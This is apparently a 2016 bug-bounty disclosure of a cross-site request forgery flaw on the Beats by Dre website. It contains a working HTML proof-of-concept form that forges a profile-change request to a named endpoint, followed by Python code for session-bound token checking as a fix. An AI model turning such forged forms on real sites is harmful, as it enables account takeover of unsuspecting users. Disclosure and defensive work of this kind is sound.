Beats By Dre Cross Site Request Forgery
Posted on 02 August 2016
Hello, I am Aaditya Purani, and I found a CSRF (Cross-Site Request Forgery) on Beats by Dr. Dre that could lead to full account takeover and information change just by sending a maliciously crafted link to the user.

Proof of Concept:

    <html>
    <!-- CSRF PoC - By Aaditya Purani -->
    <body>
    <form method='POST' action="https://www.beatsbydre.com/on/demandware.store/Sites-beats-Site/en_US/GigyaRAAS-SaveCustomer">
    <input type="hidden" name="firstName" value="hacked" />
    <input type="hidden" name="lastName" value="hackerone" />
    <input type="hidden" name="emailAddress" value="victimsemail@gmail.com" />
    <input type="hidden" name="zip" value="" />
    <input type="hidden" name="phone" value="" />
    <input type="hidden" name="csrf_token" value="VxM7k0ya2N1R69Ix9E3m/2165n60n2p399n38q6r1904o1po98r1snn323q0q/3Ex5Klu9mD1x5vMo91" />
    <input type="hidden" name="isEmailSubscription" value="true" />
    <input type="hidden" name="isAlreadySubscribed" value="false" />
    <input type="submit" value="Submit request" />
    </form>
    </body>
    </html>

Response:

    {"isCustomerSavedSuccessfully": true, "unsubscribeStatus": null}  -> Attack successful
    {"isCustomerSavedSuccessfully": false, "unsubscribeStatus": null} -> Attack unsuccessful

Clicking on this link would change the details of any user.

I have written a complete blog post here: https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/

Video PoC: https://youtu.be/2SfmmWxiDck

Apple has acknowledged me in their Hall of Fame: https://support.apple.com/en-us/HT201536

*Timeline:*
October 8th 2015 - Reported
October 23rd 2015 - Triaged
November 6th 2015 - Responded that "Matter is being investigated"
January 18th 2016 - Fixed
June 20th 2016 - Acknowledged
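The PoC above succeeds even though the form carries a csrf_token field, which implies the server was not tying that token to the session of the user who submits it. The following is an added illustration (not Beats, Apple or Demandware code) of the server-side check that defeats this class of bug: a synchronizer token derived with an HMAC over the session id, verified in constant time, plus an Origin-header check as a second layer. The endpoint model, session ids, cookie name and allowed origin are constructed for the example.

```python
"""Session-bound CSRF token check (illustrative, not the vendor's code).

A token is only accepted if it was issued for the session that presents it,
so a token the attacker obtained in their own browser is useless when the
victim's browser submits the cross-site form with the victim's cookies.
"""
import hashlib
import hmac
import secrets

# Constructed key; a real deployment loads it from a secret store, not from code.
SERVER_KEY = secrets.token_bytes(32)

# Hypothetical allowed origin for the form endpoint.
ALLOWED_ORIGIN = "https://www.beatsbydre.com"


def issue_csrf_token(session_id: str, key: bytes = SERVER_KEY) -> str:
    """Return nonce.HMAC(key, session_id:nonce); the nonce keeps tokens non-static."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str, key: bytes = SERVER_KEY) -> bool:
    """Recompute the MAC for *this* session and compare in constant time."""
    try:
        nonce, mac = token.split(".", 1)
    except (ValueError, AttributeError):
        return False
    expected = hmac.new(key, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_save_customer(request: dict) -> dict:
    """Minimal model of a profile-save endpoint.

    `request` is a dict with "cookies", "headers" and "form" sub-dicts, standing in
    for whatever framework object a real handler receives (assumption for the demo).
    """
    session_id = request.get("cookies", {}).get("sid")
    if not session_id:
        return {"isCustomerSavedSuccessfully": False, "error": "no session"}

    # Layer 1: a browser sends Origin on cross-site POSTs; reject foreign origins.
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin != ALLOWED_ORIGIN:
        return {"isCustomerSavedSuccessfully": False, "error": "bad origin"}

    # Layer 2: the token must have been issued for this session, not just be "a" token.
    token = request.get("form", {}).get("csrf_token", "")
    if not verify_csrf_token(session_id, token):
        return {"isCustomerSavedSuccessfully": False, "error": "csrf token invalid"}

    # ... persist firstName/lastName/emailAddress here ...
    return {"isCustomerSavedSuccessfully": True, "unsubscribeStatus": None}


def demo() -> dict:
    """Replay the shape of the PoC against the hardened handler; all values constructed."""
    victim_sid = "victim-session-0001"
    attacker_sid = "attacker-session-9999"
    # The attacker can only obtain a token issued for *their* session.
    attacker_token = issue_csrf_token(attacker_sid)

    forged_cross_origin = {
        "cookies": {"sid": victim_sid},
        "headers": {"Origin": "https://attacker.invalid"},
        "form": {"firstName": "hacked", "csrf_token": attacker_token},
    }
    # Same forged form, but without an Origin header: the token binding alone must catch it.
    forged_no_origin = {
        "cookies": {"sid": victim_sid},
        "headers": {},
        "form": {"firstName": "hacked", "csrf_token": attacker_token},
    }
    legit = {
        "cookies": {"sid": victim_sid},
        "headers": {"Origin": ALLOWED_ORIGIN},
        "form": {"firstName": "Alice", "csrf_token": issue_csrf_token(victim_sid)},
    }
    return {
        "forged_cross_origin": handle_save_customer(forged_cross_origin),
        "forged_no_origin": handle_save_customer(forged_no_origin),
        "legit": handle_save_customer(legit),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Marking the session cookie SameSite=Lax (or Strict) would stop the browser from attaching it to the cross-site POST in the first place; the token binding above is what protects users whose browsers do not enforce that attribute.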